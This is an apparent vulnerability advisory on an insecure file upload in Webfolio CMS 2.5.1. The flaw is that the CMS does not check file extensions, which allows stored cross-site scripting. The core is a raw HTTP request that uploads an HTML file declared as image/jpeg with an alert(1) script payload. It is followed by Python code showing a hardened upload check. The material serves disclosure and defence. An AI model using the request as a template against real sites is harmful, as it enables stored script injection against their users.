Webfolio CMS 2.5.1 Insecure File Upload
Posted on 09 August 2015
# Exploit Title: Insecure File Upload in webfolio2.5.1
# Date: 04 August 2015
# Exploit Author: Sharankumar somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7
_________________________________________________________________________________________________________________________

Insecure File Upload

Webfolio CMS is vulnerable to an insecure file upload. The application checks the size and content type of files while uploading, but it fails to check the extension of the uploaded file. A malicious user can upload a valid image file with JavaScript embedded in it and change the extension to .html; because the declared Content-Type is still image/jpeg, the check passes and the file is stored with the .html extension. An attacker can take advantage of this issue to perform persistent cross-site scripting attacks.

Raw Request:

POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"

admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"

sharan@gmail.com
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"

10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"

sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"

testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"

1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg

Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"

php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"

UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"


-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"

af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"

Save changes
-----------------------------17740215416001--
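The check the advisory describes (size and declared Content-Type, client filename kept) beside a hardened one, as an added illustration in Python rather than Webfolio's own code. The weak_check, hardened_check and download_headers functions, the size limit and the sample bytes are all constructed here; the hardened version derives the stored extension from sniffed magic bytes, requires extension, declared type and magic bytes to agree, and rejects the image-plus-HTML polyglot from the request above.

```python
# Added illustration, not Webfolio's code: the flawed check the advisory
# describes beside a hardened replacement for an avatar/picture upload.
import os
import secrets
from typing import Optional

MAX_BYTES = 2 * 1024 * 1024  # assumed limit
# Accepted image types and the only extensions ever written to disk.
ALLOWED = {"image/jpeg": ".jpg", "image/png": ".png", "image/gif": ".gif"}
MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png",
         b"GIF87a": "image/gif", b"GIF89a": "image/gif"}


def sniff(data: bytes) -> Optional[str]:
    """Identify the image type from leading bytes, ignoring the declared type."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def weak_check(filename: str, declared_type: str, data: bytes) -> Optional[str]:
    """Flawed logic: trusts the declared Content-Type and keeps the client's name."""
    if len(data) > MAX_BYTES or declared_type not in ALLOWED:
        return None
    return os.path.basename(filename)  # "test.html" is stored and later rendered


def hardened_check(filename: str, declared_type: str, data: bytes) -> Optional[str]:
    """Accept only if extension, declared type and magic bytes agree; return a
    server-generated name whose extension comes from the sniffed type."""
    if not data or len(data) > MAX_BYTES:
        return None
    ext = os.path.splitext(filename)[1].lower().replace(".jpeg", ".jpg")
    sniffed = sniff(data)
    if sniffed is None or sniffed != declared_type or ALLOWED[sniffed] != ext:
        return None
    # Heuristic against image/HTML polyglots like the advisory's payload;
    # re-encoding the image with an image library is the robust form of this step.
    lowered = data.lower()
    if b"<script" in lowered or b"<html" in lowered:
        return None
    return secrets.token_hex(8) + ALLOWED[sniffed]


def download_headers(stored_name: str) -> dict:
    """Serve stored uploads so the browser never sniffs them into HTML."""
    mime = next(m for m, e in ALLOWED.items() if stored_name.endswith(e))
    return {"Content-Type": mime, "X-Content-Type-Options": "nosniff",
            "Content-Disposition": f'inline; filename="{stored_name}"'}


# Constructed samples: a JPEG header followed by the advisory's HTML, and a clean one.
POLYGLOT = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<html><script>alert(1)</script></html>"
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
```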